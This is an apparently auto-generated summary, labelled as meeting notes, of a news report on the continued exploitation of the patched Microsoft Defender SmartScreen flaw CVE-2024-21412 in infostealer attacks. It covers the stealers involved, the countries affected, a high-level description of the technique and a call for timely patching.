July 24, 2024 at 03:11PM
A critical Microsoft Defender SmartScreen vulnerability (CVE-2024-21412) patched in February is still exploited in infostealing attacks globally. Exploiting SmartScreen’s security bypass allows attackers to disguise malicious code in images and trigger downloads, compromising data from various applications. Organizations with delayed Microsoft patch cycles are particularly vulnerable, emphasizing the need for timely security updates.
Key Takeaways from the Meeting Notes:
1. A Microsoft Defender SmartScreen vulnerability, CVE-2024-21412, with an 8.1 CVSS score and “high” severity, was disclosed and patched on Feb. 13. However, it is still being exploited in infostealing attacks worldwide.
2. Known infostealers such as Lumma Stealer, Water Hydra, and DarkGate have been utilizing the CVE-2024-21412 vulnerability, and new attacks involving Meduza and ACR have been flagged by Fortinet. These attacks have impacted the US, Spain, and Thailand.
3. The attackers are exploiting the SmartScreen bypass vulnerability through a combination of PowerShell techniques and hiding attacks within images. This allows them to disable notifications and execute malicious code by utilizing image-based attacks.
4. Unpatched systems are at risk of having stealers planted in legitimate Windows processes, leading to the extraction of a wide range of data, including information from various browsers, crypto wallets, messenger apps, password managers, VPN apps, email clients, and FTP clients.
5. Aamir Lakhani from Fortinet emphasizes the importance of regular patching, particularly for Microsoft software, and urges software vendors to provide users with alerts and notifications for critical security patches.
In summary, the meeting notes highlight the ongoing exploitation of CVE-2024-21412 in infostealing attacks, the methods used by attackers to bypass SmartScreen, the potential consequences for unpatched systems, and the importance of timely software patching practices.